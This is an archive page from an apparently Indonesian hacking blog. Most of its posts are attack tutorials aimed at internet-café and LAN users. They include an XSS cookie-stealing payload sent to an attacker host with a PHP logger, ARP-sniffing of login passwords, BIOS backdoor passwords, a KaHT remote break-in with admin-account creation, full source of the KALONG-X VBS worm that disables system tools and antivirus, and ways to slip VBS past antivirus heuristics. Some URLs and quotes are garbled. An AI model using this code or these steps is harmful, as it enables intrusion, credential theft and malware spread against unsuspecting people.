Archive for January, 2009


Cara Membuat Hang Komputer Tetangga Di Warnet

Filed under: HackingLeave a comment
January 30, 2009

ikuti langkah2 berikut ini :
1.buka command prompt/cmd anda, caranya klik start > run > cmd
2.Saat command prompt anda muncul, ketik edit iseng.bat
3.Maka tampilan command prompt anda akan berbeda. setelah itu

masukkan/ketikkan code di bawah ini :
net send [ipkomputer]/[namakomputer] pesan anda
contoh :
net send 192.168.101.7 sorry ya kompi lagi capek restart dulu ya
call iseng.bat

kemudian save as file tersebut.

Untuk menjalankannya tinggal klik file iseng.bat tersebut

Keterangan dan tips :

  • iseng.bat adalah nama file bisa diganti dengan nama lain misalnya coba.bat, kucing.bat dll.
  • Saat menyimpan file pada menu cmd, perhatikan huruf yang dicetak berbeda dengan huruf lainnya:
  • File : huruf F dicetak berbeda, maksudnya untuk mengakses menu file kita harus menekan tombol F.
  • Hal tersebut juga berlaku pada menu menu lainnnya.
  • Untuk berpindah ke area ketikan lain gunakan tombol tab.
Comment

Hack Password Friendster Pengunjung Warnet Dengan Cain Abel

Filed under: Hack fsLeave a comment

Cara ini menggunakan program cain abel. Sebenarnya bukan hanya password friendster saja yang dapat dibobol dengan program ini. Semua website yang memiliki fasilitas login dapat dibobol dengan program ini kecuali jika website tersebut menggunakan ssl yang ditandai dengan tanda gembok yang muncul pada browser saat kita akan melakukan login. Website yang menggunakan ssl diantaranya yahoomail, gmail, rapidshare dll. To the point aja dah ikuti cara berikut :

1. Download program cain abel DISINI
2. Install program, tinggal next next OK aja.
3. Nah skarang buka programnya.
4. Klik configure klik di tab sniffer adapter yang aktif, bisanya klo aktif ada IP adress misalnya 192.168.0.1. Trs klik OK.

5. Skrg klik tab sniffer, lalu klik pada bagian bawah program pada icon host yg ak tandai dengan warna merah , lalu klik tanda + yg ak tandai dengan warna biru di bagian atas, nanti akan muncul tampilan seperti di gambar.

6. Klik pada opsi “All Host In My Subnet” dan “All Test”.
10. Klik pada tab APR, lalu klik tanda +, muncul tampilan baru , pada bagian kiri pilih IP target, bagian kanan klik ip yang paling atas trs OK. Saran saya sih ip targetnya diklik smua aja tapi klikna harus satu2 gak bisa langsung.
7. Skrg aktifkan sniffer dengan cara klik pada icon start/stop sniffer yg ak tandai warna hijau.
8. Skrg klik pada tab password yg ak tandai dengan warna kuning.
9. Cari yang http lalu klik, nah sekarang anda tinggal menunggu beberapa saat.

Sekedar mengingatkan trik ini pada sebagian kecil warnet dapat merusak billing dan juga dapat membuat koneksi internet mengalami gangguan. Saat saya coba di 2 warnet, pengunjungnya pada pulang gara gara koneksinya putus, dan pada salah satu warnet billing operatornya rusak.

Comment

Mengetahui password fs orang

Filed under: Hack fs3 Comments

Mau tau cara hack password friendster orang ?? tapi syaratnya agak susah nie lo copy paste aja word di bawah ini!!!!

syarat :

1. Punya FS (tentunya)
2. Punya sites, buat yg gratisan yg support script PHP untuk melihat/eksekusi
cookie yag sudah kita tanam
3. gunakan mozilla
langkah-langkah :

1. login FS
2. masuk ke profile–>edit profile–>customize
3. paste code berikut di bagian CSS (Upload an image with PhotoBucket) untuk
menjalankan javascript
(penempatan bisa dimana saja, atas/bawah)

naon_wae_lah(apa aja lah) {
height :
expr/**/ession(document.location=’http:///.php?kukis=’+document.cookie)
}

a. yoursite=site yg dah dibikn pake situs gratisan (lihat syarat no 2), contoh :
http://www.evil-site.com
b. yourfile=file untuk menanam cookies pada situs gratisan (lihat a), contoh:
cook.php

4. buat file cook.php(lihat b)

——————————————————————–

{?php
$kokis = $HTTP_GET_VARS[’kukis’];
$filename = “cok.log”;

‘// metoda dengan append append

$handle = fopen($filename, ‘a’);
fwrite($handle, $kokis);

fClose($handle);
‘// redirect-in ke punya tmn lo
echo “{script}document.location=’http://www.friendster.com’;{/script}”;

?}

——————————————————————–
Jangan lupa rubah tanda ‘{’ jadi ‘< ’ dan ‘}’ jadi ‘>’
tanpa tanda curek.

trus kl dah gt, ngpain ? kacape-kacape.
hmmmmm, ….., ya udah cma gt doang
cari target tmn lo. ( pasang foto yg agk cakepan dikit… hehehehee, buat
mancing doang)
biarkan tmn lo buka profile lo.

ya, memang profile lo gk da bs dbuka, tp liat di
http:////cok.log
Huh…..Panen gk ya…!!!, ya gmn muka see…. he..he..he
dah dulu ah, ….so boreddddddddddddddddd……….!!!
eh bentar dulu mo kmana..!!!.
trus kl dah panen gmn ?

nynt dunk..
cari aja nama cookies “friendster_auth=uid” di
http:////cok.log
nama cookies yg laen sprt: friendster_auth=deleted,friendster_pusit_auth=uid
abaikan saja

contoh hasil panen :
friendster_auth=uid=33674163&lastclick=1163646748&cty=id&icty=au&mac=
ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk*

trus di apain ?
Buka pake notepad aja :
C D ocuments And SettingsAdministratorApplication
DataMozillaFirefoxProfiles.defaultcookies.txt

replace karakter ascii “=” dengan %3D
replace karakter ascii “?” dengan %26
replace karakter ascii “*” dengan %2A

Trus ?
trus, trus mulu ky tukng parkir….heheheh
hapus semua var Cookie, trus isikan text dibawah ini

.www.friendster.com True / False XXXXXX friendster_
auth uid%3D33674163&lastclick%3D1163646748&cty%3Did&icty%3Dau&mac

%3DODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk2A

Close smua browser, buka mozilla,……
trus………., ya lihat disamping kanan “LOGOUT” N Foto victim cakep bukan
????////

Comment

Password-password bios

Filed under: HackingLeave a comment

Award BIOS backdoor passwords:

ALFAROME
ALLy
aLLy
aLLY
ALLY
aPAf
_award
AWARD_SW
AWARD?SW
AWARD SW
AWARD PW
AWKWARD
awkward BIOSTAR
CONCAT
CONDO
Condo
d8on
djonet
HLT
J64
J256
J262
j332
j322 KDD
Lkwpeter
LKWPETER
PINT
pint
SER
SKY_FOX
SYXZ
syxz
shift + syxz
TTPTHA
ZAAADA
ZBAAACA
ZJAAADC
01322222
589589
589721
595595
598598

AMI BIOS backdoor passwords:

AMI
AAAMMMIII
BIOS
PASSWORD
HEWITT RAND
AMI?SW
AMI_SW
LKWPETER
A.M.I.
CONDO

PHOENIX BIOS backdoor passwords:
phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS :

ALFAROME
BIOSTAR
biostar
biosstar
CMOS
cmos LKWPETER
lkwpeter
setup
SETUP
Syxz
Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
TMC BIGO
Toshiba Toshiba

Comment

Masuk komputer orang dalam jaringan

Filed under: Hacking1 Comment

Anda ingin
masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi
harddisk teman anda, membuat directory, membuat file, mendelete file atau
apa saja ? itu mudah, semua caranya ada disini.
Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu
internet Maniac (Internet Maniac.exe) … Download Interenet
Maniac<http://sumitbirla.com/network-spy/maniac.zip>
Berfungsi untuk mengetahui ip addreas client melalui computer name /
hostname
KaHT (KaHt.exe) … Download program hacker
KaHT<http://www.geocities.com/yk_family_code/kaht.zip>
Berfungsi sebagai program untuk menerobos ke computer server atau client
Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai
warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname
dengan 2 cara.
Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai
warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Setelah 2 program diatas di download maka ekstractlah dahulu program
tersebut, entah pake WINZIP atau pake apa.
Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda
dengan melihat para hostname dengan 2 cara.
Untuk Windows XP
Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu
pilih A computer on the Network lalu langsung klik search maka akan segera
muncul computer-komputer yang terkoneksi dalam jaringan.
Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini)
)
Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada
menu Search for other item pilihlah computers, lalu akan muncul Search for
computer, maka langsung klik Search Now maka nama-nama computer akan muncul
(Alternatif cara yang cepat dapat mengklik My Network Place / Network
Neighboure saja)
Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka
loe langsung aja jalankan program Internet Maniac
Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik
resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor
ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki.
Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan
berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh
antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau
terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja
dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting,
tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.
Cara masuk DOS Mode
Untuk Windows XP :
Masuklah ke Start, All programs, Accessories lalu Command Prompt
Untuk Windows 95/98/Me/NT/2000
Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt
Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh
bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di
C:\KaH) maka ketikkan “CD\KaHT” dan seterusnya.
Jika sudah, ini saatnya?
Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : “KaHT Ip1 ip2″
ip1 : ip awal yang discan
ip2 : ip terahkir yang discan

Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac
tadi itu lho.
Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1″ lalu enter aja
Nah disini nanti program akan bekerja otomatis.
Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka
anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda
akan berada di “c:\windows\system” milik komputer tujuan / sasaran setelah
pen-scan-an selesai.
Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe
Nah kalo udah begini kita bisa berkreasi :
Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server,
ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus
nanti ketahuan ama operator warnetnya, hehe.
Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus /
kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut,
biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di
On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat
“/logs” maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka
cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log
hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe,
kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya
atau periksa di MiRC.INI, gampangkan.
Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa
lho, delete aja file-file systemnya, hehe.
Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih
bermanfaat dari pada diatas
Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan
Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan
usil dari pihak-pihak yang tidak bertanggung jawab..
5.Membuat akses administrator Windows untuk kita lewat komputer lain
Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui
LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht
yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik.
Melihat akses guest dan administrator di Windows
Ketik : net user
Melihat aktif tidaknya guest di Windows
Ketik : net user guest
Membuat akses guest menjadi Administrator dengan perintah :
Ketik : net localgroup Administrators Guest /add
Membuat akses adminstrator sendiri :
1. Ketik : net user <nama user> <password> /add
2. Ketik : net localgroup Administrators <nama user> /add
Menghapus akses administrator
Ketik : net localgroup Users <nama user> /delete

Catatan:
segala yang anda buat pada artikel ini adalah tanggung jawab anda!!!!!!!!!

Comment

sejarah virus

Filed under: Virus TutorialLeave a comment

Virus yang pertama kali muncul di dunia ini bernama [Elk Cloner] lahir kira-kira tahun 1981 di TEXAS A&M. Menyebar melalui disket Apple II yang ada operating systemnya. Sang perusak ini mendisplay pesan di layar : It will get on all your disks-It will infiltrate your chips–yes it is Cloner!-It will stick to you like glue-It will modify RAM too-send in the Cloner!” Hi……………….

Nama “Virus” itu sendiiri baru diberkan setelah 2 tahun kelahirannya oleh Len Adleman pada 3 November 1983 dalam sebuah seminar yang ngebahas cara membuat virus and memproteksi diri dari virus. Tapi orang-orangorang sering menganggap bahwa virus yang pertama kali muncul adalah virus [Brain] yang justru lahir tahun 1986. Wajar aja, soalnya virus ini yang paling menggemparkan dan paling meluas penyebarannya karean menjalar melalui disket DOS yang waktu itu lagi ngetrend. Lahirnya juga bersamaan dengan [PC-Write Trojan] dan [Vindent]

Mulai saat itu, `virus mulai menguasai dunia. Perkembangannya mengerikan dan sangar banget ! berselang satu tahun muncul virus pertama yang menginfeksi file. Biasanya yang diserang adalah file yang berekstensi *.exe Virus ini bernama [suriv] termasuk dalam golongan virus “jerussalem”. Kecepatan penyebarannya cukup ‘menggetarkan hati’ untuk saat itu. Tapi virus ini ngga’ terlalu jahat ko’ soalnya virus ini menghantam dan menghajar mainframe-nya IBM ngga’ lama-lama, cuma setahun (eh setahun itu lama apa sebentar ya…?)

Tahun 1988, muncul serangan BESAR terhadap Machintosh oleh virus [MacMag] dan [scores] dan jaringan Internet dihajar habis-habisan oleh virus buatan Robert Morris. Tahun 1989 ada orang iseng yang ngirim file “AIDS information program” dan celakanya, begitu file ini dibuka, yang didapat bukannya info tentang AIDS, tapi virus yang mengenskrypsi harddisk dan meminta bayaran untuk kode pembukanya (hehehe…….. ada-ada aja cara orang nyari duit)

Sejak saat itu, penyebaran virus udah ngga’ keitung lagi. Akan tetapi dampak yang ditimbulkan ngga’ terlalu besar. Baru tahun 1995 muncul serangan besar-besaran. Ngga’ tanggung-tanggung, mereka nyerang perusahaan-perusahaan besar diantaranya Griffith Air Force Base, Korean Atomic Research Institute, NASA, IBM dan masih banyak PERUSAHAAN RAKSASA lain yang dianiaya oleh “INETRNET LIBERATION FRONT” di hari ~Thanksgiving~. Karena keberanian dan kedahsyatan serangan itu, tahun 1995 dijuluki sebagai tahunnya para Hacker dan Cracker.

Para Cracker memang tidak pernah puas. Setiap muncul sistem operasi atau program baru, mereka sudah siap dengan virus barunya. Kamu yang sering ngetik dengan MS Word mungkin pernah nemuin virus Titassic. Ini virus local asli Indonesia lho… and uniknya, virus ini ngingetin kita buat sholat tepat pada waktunya (waduh, alim juga ya..) Tapi jangan salah, virus macro yang punya judul [concept]ini juga bisa berhati jahat, sangar and ganas banget. Soalnya si alim yang jahat ini bakalan ngemusnahin 80% file-file data and program korbannya. Nah, seiring dengan perkembangan teknologi, muncul virus pertama yang mengkombinasi virus macro dan worm. Namanya cukup manis [Melissa]. Tapi ngga’ semanis namanya, virus ini bakalan menyebar ke orang lain lewat E-Mail and yang paling menyakitkan, ia bakalan nyebar ke semua alamat E-Mail yang ada di address book-mu. Dan saat ini muncul jutaan virus yang bergentayangan ngga’ karuan di alam Internet.

Baru-baru ini bermunculan virus-virus baru buatan cracker konyol dari Indonesia (hehehe.. ternyata orang Indonesia ngga’ cuman pinter korupsi, tapi juga ahli merusak). Gawatnya, Antivirus mancanegara sebangsa NORTON ANTIVIRUS ngga’ bakalan bisa membasmi virus ini. Solusinya, download aja antivirus handal dari VAKSIN.COM

Comment

Buat virus dari notepad

Filed under: Virus TutorialLeave a comment

(

Nah kita akan buat varian lain dari KALONG.VBS. Yaitu KALONG-X.VBS. Lebih hebat dari Kalong.VBS. Sebenarnya ini varian ketiga. Sebenarnya virus ini sama saja dengan Kalong.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan )
Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggak Copy > Paste….
‘Kalong-X
‘Varian dari Kalong.VBS
on error resume next

‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd

’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)
tf.attributes = 39

’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then

set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes = 39

set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)

‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::”

‘File Hidden tak terlihat
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”

‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1, “REG_DWORD”

‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE KALONG-X”
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic”

‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs”

‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”

‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :

Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.
Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.
Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature=”$Chicago$”
Provider=Fariskhi

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger

Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad

Comment

3 Teknik Enkripsi File VBS

Filed under: Virus TutorialLeave a comment

Halo Virologers!!! Saya akan memberitahu anda tentang 3 Teknik Enkripsi File VBS yang saya tahu. Kita mulai dari yang pertama ya…..

1) Caesar Chiper
Caesar Chiper adalah teknik enkripsi file VBS dengan cara memajukan atau memundurkan karakter. Ini merupakan teknik yang sangat sering digunakan.

Contoh:
virus
Enkripsi: uhqtr (Masing-masing karakter dimundurkan 1 karakter)

atau

virus
Enkripsi: wjsvt (Masing-masing karakter dimajukan 1 karakter)

Masih banyak contoh enkripsi Caesar Chiper. Misalnya dimajukan/dimundurkan sebanyak 2 kali, 3 kali, dll.

2) Reverse
Teknik reverse ini sangat jarang digunakan karena sangat mudah untuk diketahui cara pendekripsiannya. Pengenkripsiannya adalah dengan memindahkan huruf-huruf terbalik atau huruf-huruf tersebut dibalik urutannya.

Contoh:
virus
Enkripsi: suriv (Urutan hurufnya dibalik)

3) Caesar Chiper + Reverse (Mixed)
Nah, karena teknik Reverse dan Caesar Chiper masih dapat dengan mudah diketahui, ada cara yang lebih hebat lagi. Yaitu gabungan antara Teknik Caesar Chiper dengan teknik Reverse.

Contoh:
virus
Enkripsi: rtqhu (Huruf dimundurkan 1 karakter lalu di-reverse)

Kalau anda bingung maksud dari Karakter, mungkin anda dapat mengenalnya di VB. Di VB disebut Ascii. Contohnya, anda ingin mendapatkan nilai karakter dari huruf “K”, jadi ketikkan kode berikut ini:

‘###START-HERE###’
MsgBox Str(Asc(“K”))
‘####END-HERE####’

Penjelasan:
1) MsgBox >> Untuk menampilkan Message Box
2) Str >> Mengubah angka menjadi String
3) Asc >> Mendapatkan nilai karakter
4) “K” >> Yang akan diambil nilai karakternya

Itu saja. Bagaimana? Tertarik untuk membuat virus VBS? Then, let’s do it!!!!

Comment

VBScript Tanpa ScriptFullName by Adryan Jonly

Filed under: Virus TutorialLeave a comment

Hai sobat virologger apa kabar ?

Ok. Kamu tahukan apa itu common vbs virus heuristic ? Yup itu benar, mencari string “wscript.scriptfullname” pada file berekstensi *.vbs maupun *.vbe. Lalu bagaimanakah cara agar teknik heuristic ini di bypassing.

Tak perlu bersusah payah, karena ternyata kini telah ada software untuk mengenkripsi vbs secara keseluruhan (sekaligus dengan kode perintah script-nya) dengan metode enkripsi rotate. Sedangkan untuk membypass metode vbs emulator, coba enkripsi dua kali atau tiga kali dan empat kali juga boleh script vbs yang telah terenkripsi. Yaitu dengan VBScript ROTCryptor yang dapat kamu download di alamat download softwares pralabs:

http://www.prasetyolabs.co.cc/downloads.html.

Berikut aku experiment dengan script vbs:

MsgBox(“Hello Virologger!”)

Setelah itu klik button ROTXCrypt.

Lihatlah, bahkan perintah MsgBox dan string “Hello Virologger!” tak terlihat.
Coba buka menu Run dan klik sub menu Start.
Maka script vbs tadi akan jalan seperti berikut.

Oh yak, kalau kamu pengen acak variabelnya tinggal klik button Randomize Variable pada saat sebelum enkripsi. Quotation mark dan nilai rotated bisa diubah sesuka hati.

Sebenernya VBScript ROTCryptor tidak ditunjukan untuk memfasilitasi pembuatan malware bagi para underground karena ditunjukan dengan adanya algoritma PRAVGramming yang mencegah kamu untuk membuat malware (virus ataupun worm) vbs. Tapi bisa diakali dengan cara mendelete file pravg.cpp yang terdapat dalam folder yang sama dengan vbsrtc.exe untuk mendapatkan previlege programmer atau security tester.

Comment

Menghack waktu tunggu 4shared dan Rapidshare

Filed under: Hacking2 Comments

Sebagian besar dari anda menggunakan 4shared untuk virtual drive anda bukan? Tetapi yang paling menyebalkan adalah ketika anda mau mengunduh (download/donlot) file anda harus menunggu beberapa detik sebelum tombol “Download” muncul. Sama seperti di RapidShare.

Bukankah itu menyebalkan? Sebenarnya kita tidak perlu menunggu selama itu. Dengan sedikit akal-akalan, anda dapat menghack “Download Time Waiting” atau waktu tunggu download. Caranya? MUDAH SEKALAIAIAAIAIAI!!!!

1) Buka halaman download file RapidShare atau 4shared
2) Klik tombol “Free User” (RapidShare) atau “Download” (4Shared)
3) Saat waktu tunggu sedang berjalan, ketikkan kode berikut ini pada Address Bar Browser anda:
Quote:

